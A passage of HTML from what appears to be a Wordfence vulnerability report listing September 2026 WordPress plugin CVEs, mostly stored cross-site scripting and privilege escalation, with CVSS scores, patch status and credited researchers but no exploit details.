<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-85418" target="_blank" rel="noopener noreferrer">							CVE-2026-85418						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 7, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/themeisle-companion" target="_blank" rel="noopener">Orbit Fox: Duplicate Page, Menu Icons, SVG Support, Cookie Notice, Custom Fonts &amp; More</a> <span class="wfvr-software-slug">[themeisle-companion]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/farid-narimanov-2" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/378ee82a41d6ac71e897c1fb256f3e84.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="378ee82a41d6ac71e897c1fb256f3e84"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/farid-narimanov-2" target="_blank" rel="noopener">Farid Narimanov</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/fc5b0f8f-2623-4d89-b78b-8dcc7289e306" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/fc9253bc-feee-422f-aafb-1630f2d1ad2e" target="_blank" rel="noopener">Podlove Podcast Publisher &lt;= 4.5.5 &#8211; Authenticated (Contributor+) Stored Cross-Site Scripting via &#8216;episode_contributor[..][..][comment]&#8217; Parameter</a></h4>
<div class="cvss-score-badge">6.4</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>6.4 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-75966" target="_blank" rel="noopener noreferrer">							CVE-2026-75966						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 8, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/podlove-podcasting-plugin-for-wordpress" target="_blank" rel="noopener">Podlove Podcast Publisher</a> <span class="wfvr-software-slug">[podlove-podcasting-plugin-for-wordpress]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/prism" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/b0bd54077fbac807142b902c61d6430c.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="b0bd54077fbac807142b902c61d6430c"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/prism" target="_blank" rel="noopener">Wordfence PRISM</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/fc9253bc-feee-422f-aafb-1630f2d1ad2e" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/31c554cf-eee9-45a8-8fb6-198978620204" target="_blank" rel="noopener">Redux Framework &lt;= 4.5.13.1 &#8211; Authenticated (Subscriber+) Stored Cross-Site Scripting via Slider Field Value</a></h4>
<div class="cvss-score-badge">6.4</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>6.4 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-5399" target="_blank" rel="noopener noreferrer">							CVE-2026-5399						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 9, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/redux-framework" target="_blank" rel="noopener">Redux Framework</a> <span class="wfvr-software-slug">[redux-framework]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/hoshino" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/e0f701652a71213d4d5afd11c6694ce0.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="e0f701652a71213d4d5afd11c6694ce0"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/hoshino" target="_blank" rel="noopener">h0xilo</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/31c554cf-eee9-45a8-8fb6-198978620204" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/38bbfc7f-dd86-486e-a2d3-4f26fd9ee3c0" target="_blank" rel="noopener">Simple Payment &lt;= 2.5.4 &#8211; Authenticated (Contributor+) Stored Cross-Site Scripting</a></h4>
<div class="cvss-score-badge">6.4</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>6.4 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-62111" target="_blank" rel="noopener noreferrer">							CVE-2026-62111						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 11, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/simple-payment" target="_blank" rel="noopener">Simple Payment</a> <span class="wfvr-software-slug">[simple-payment]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/v1t" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/efd10eb3421a6ca0a3d855ad7029a801.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="efd10eb3421a6ca0a3d855ad7029a801"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/v1t" target="_blank" rel="noopener">V1T</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/38bbfc7f-dd86-486e-a2d3-4f26fd9ee3c0" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/d781b699-8bec-458c-8ba1-cef8bd566978" target="_blank" rel="noopener">Sina Extension for Elementor 3.7.1 &#8211; 3.10.3 &#8211; Authenticated (Contributor+) Stored Cross-Site Scripting</a></h4>
<div class="cvss-score-badge">6.4</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>6.4 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-83541" target="_blank" rel="noopener noreferrer">							CVE-2026-83541						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 9, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/sina-extension-for-elementor" target="_blank" rel="noopener">Sina Extension for Elementor</a> <span class="wfvr-software-slug">[sina-extension-for-elementor]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/dmitrii" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/54998c6d0860cc6e1f5fee1e7efedb56.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="54998c6d0860cc6e1f5fee1e7efedb56"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/dmitrii" target="_blank" rel="noopener">Dmitrii Ignatyev</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/d781b699-8bec-458c-8ba1-cef8bd566978" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/949d61d9-641e-4e66-a3de-8408632b8c77" target="_blank" rel="noopener">Visual Composer Website Builder &lt;= 45.16.1 &#8211; Authenticated (Contributor+) Stored Cross-Site Scripting</a></h4>
<div class="cvss-score-badge">6.4</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>6.4 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-62138" target="_blank" rel="noopener noreferrer">							CVE-2026-62138						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 10, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/visualcomposer" target="_blank" rel="noopener">Visual Composer Website Builder</a> <span class="wfvr-software-slug">[visualcomposer]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/sungbyeongchan" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/3dd75d22cf7caf7fb02d4911f1dbfa51.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="3dd75d22cf7caf7fb02d4911f1dbfa51"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/sungbyeongchan" target="_blank" rel="noopener">sungbyeongchan</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/949d61d9-641e-4e66-a3de-8408632b8c77" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/0b78d34f-6702-45dd-ba56-46e9c547bc9f" target="_blank" rel="noopener">WP Crowdfunding &lt;= 2.2.1 &#8211; Authenticated (Subscriber+) Stored Cross-Site Scripting via &#8216;first_name&#8217; Parameter</a></h4>
<div class="cvss-score-badge">6.4</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>6.4 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-19945" target="_blank" rel="noopener noreferrer">							CVE-2026-19945						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 8, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/wp-crowdfunding" target="_blank" rel="noopener">WP Crowdfunding</a> <span class="wfvr-software-slug">[wp-crowdfunding]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/prism" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/b0bd54077fbac807142b902c61d6430c.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="b0bd54077fbac807142b902c61d6430c"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/prism" target="_blank" rel="noopener">Wordfence PRISM</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/0b78d34f-6702-45dd-ba56-46e9c547bc9f" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/bbcefb55-f712-47a5-885a-b0feceaf20fd" target="_blank" rel="noopener">WP Docs &lt;= 2.3.3 &#8211; Authenticated (Subscriber+) Stored Cross-Site Scripting</a></h4>
<div class="cvss-score-badge">6.4</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>6.4 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-81782" target="_blank" rel="noopener noreferrer">							CVE-2026-81782						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="unpatched"><br />
						Unpatched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 9, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/wp-docs" target="_blank" rel="noopener">WP Docs</a> <span class="wfvr-software-slug">[wp-docs]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/dodoh4t" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/2b7e2a8d4c137f1479be4362c52fd452.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="2b7e2a8d4c137f1479be4362c52fd452"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/dodoh4t" target="_blank" rel="noopener">dodoh4t</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/bbcefb55-f712-47a5-885a-b0feceaf20fd" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/f553397c-c1f7-41e9-b14a-cd1a01dd6f8e" target="_blank" rel="noopener">WP Highlight Box &lt;= 1.0 &#8211; Authenticated (Contributor+) Stored Cross-Site Scripting</a></h4>
<div class="cvss-score-badge">6.4</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>6.4 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-86790" target="_blank" rel="noopener noreferrer">							CVE-2026-86790						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="unpatched"><br />
						Unpatched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 12, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/wp-highlight-box" target="_blank" rel="noopener">WP Highlight Box</a> <span class="wfvr-software-slug">[wp-highlight-box]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researchers</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/pablo-gonzalez" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/7fe5317595b8e4f4fe5505d7bb59d8cc.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="7fe5317595b8e4f4fe5505d7bb59d8cc"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/pablo-gonzalez" target="_blank" rel="noopener">Pablo González</a></div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/francisco-jose-ramirez" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/194d5edb5df95ed8b7295c13d737c8c1.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="194d5edb5df95ed8b7295c13d737c8c1"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/francisco-jose-ramirez" target="_blank" rel="noopener">Francisco José Ramírez</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/f553397c-c1f7-41e9-b14a-cd1a01dd6f8e" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/888dfcc5-a903-4b2d-846b-c93f0b33b0c7" target="_blank" rel="noopener">Zephyr Project Manager &lt;= 3.3.205 &#8211; Authenticated (Custom+) Stored Cross-Site Scripting via &#8216;message&#8217; Parameter</a></h4>
<div class="cvss-score-badge">6.4</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>6.4 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-76931" target="_blank" rel="noopener noreferrer">							CVE-2026-76931						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 7, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/zephyr-project-manager" target="_blank" rel="noopener">Zephyr Project Manager</a> <span class="wfvr-software-slug">[zephyr-project-manager]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/nabil-irawan" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/86a1429aeb8e473ec62cf8dd3d4e4571.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="86a1429aeb8e473ec62cf8dd3d4e4571"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/nabil-irawan" target="_blank" rel="noopener">Nabil Irawan</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/888dfcc5-a903-4b2d-846b-c93f0b33b0c7" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/1fb9cf14-e016-42b9-9a09-e762fcdbcee6" target="_blank" rel="noopener">Gato GraphQL &lt;= 19.2.3 &#8211; Authenticated (Subscriber+) Privilege Escalation</a></h4>
<div class="cvss-score-badge">6.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>6.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-62102" target="_blank" rel="noopener noreferrer">							CVE-2026-62102						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 11, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/gatographql" target="_blank" rel="noopener">Gato GraphQL</a> <span class="wfvr-software-slug">[gatographql]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/benzdeus" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/6dd380c38e13e8dc02631e8ea879a9e4.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="6dd380c38e13e8dc02631e8ea879a9e4"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/benzdeus" target="_blank" rel="noopener">benzdeus</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/1fb9cf14-e016-42b9-9a09-e762fcdbcee6" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/904691f4-26fd-4065-b9c1-aacdd6b3b3ee" target="_blank" rel="noopener">MultiVendorX – WooCommerce Multivendor Marketplace AI Powered Solutions 5.0.0 &#8211; 5.0.15 &#8211; Authenticated (Custom Role+) Privilege Escalation</a></h4>
<div class="cvss-score-badge">6.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>6.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-74925" target="_blank" rel="noopener noreferrer">							CVE-2026-74925						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 11, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/dc-woocommerce-multi-vendor" target="_blank" rel="noopener">MultiVendorX – WooCommerce Multivendor Marketplace AI Powered Solutions</a> <span class="wfvr-software-slug">[dc-woocommerce-multi-vendor]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/philipp-doblhofer" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/bb525902f3ac5c4bbe1c6fb9fa9a0b4d.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="bb525902f3ac5c4bbe1c6fb9fa9a0b4d"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/philipp-doblhofer" target="_blank" rel="noopener">Philipp Doblhofer</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/904691f4-26fd-4065-b9c1-aacdd6b3b3ee" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/e993e724-c27d-4724-b2b1-fcbae9e761b7" target="_blank" rel="noopener">Registration Form for WooCommerce 1.1.0 &#8211; 1.1.2 &#8211; Authenticated (Contributor+) Privilege Escalation</a></h4>
<div class="cvss-score-badge">6.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>6.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-81431" target="_blank" rel="noopener noreferrer">							CVE-2026-81431						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 11, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/registration-form-for-woocommerce" target="_blank" rel="noopener">Registration Form for WooCommerce</a> <span class="wfvr-software-slug">[registration-form-for-woocommerce]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/sai-praneeth-koti" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/da87f3eddb4ac7ac5ccd63ae400c168c.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="da87f3eddb4ac7ac5ccd63ae400c168c"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/sai-praneeth-koti" target="_blank" rel="noopener">Sai Praneeth Koti</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/e993e724-c27d-4724-b2b1-fcbae9e761b7" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/d74b0f43-02ef-4641-9b11-ef6d963941a0" target="_blank" rel="noopener">SMS Alert – SMS &amp; OTP for WooCommerce, Order Notifications &amp; Abandoned Cart Recovery &lt;= 3.9.9 &#8211; Authenticated (Subscriber+) Privilege Escalation</a></h4>
<div class="cvss-score-badge">6.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>6.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-62106" target="_blank" rel="noopener noreferrer">							CVE-2026-62106						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 11, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/sms-alert" target="_blank" rel="noopener">SMS Alert – SMS &amp; OTP for WooCommerce, Order Notifications &amp; Abandoned Cart Recovery</a> <span class="wfvr-software-slug">[sms-alert]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
